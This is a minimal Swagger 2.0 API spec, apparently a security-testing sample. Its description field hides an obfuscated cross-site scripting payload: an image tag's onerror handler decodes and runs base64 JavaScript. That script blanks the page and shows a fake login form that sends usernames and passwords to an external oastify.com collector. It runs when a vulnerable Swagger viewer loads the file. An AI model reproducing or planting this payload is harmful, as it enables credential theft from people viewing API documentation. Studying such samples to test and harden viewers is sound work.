swagger: '2.0'
info:
  version: "0.0.1"
  title: Example title
  description: <img src=x id='ZG9jdW1lbnQuYm9keS5pbm5lckhUTUw9Jyc7IHZhciBhPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2Zvcm0nKTthLmFjdGlvbj0iaHR0cDovL2cyajdvZTVuMTlocHZqcmlndmNmeXVyN3h5M3ByZ3U0ai5vYXN0aWZ5LmNvbSI7YS5tZXRob2Q9J1BPU1QnO2EuaW5uZXJIVE1MPSc8Y2VudGVyPlVzZXJuYW1lOiA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0idXNlck5hbWUiPjxicj5QYXNzd29yZDogPGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwd2QiPjxicj48aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iTG9naW4iPjwvY2VudGVyPic7IGRvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7Cg==' onerror='eval(atob(this.id))'>
paths:
  /:
    get:
      responses:
        200:
          description: Successful response
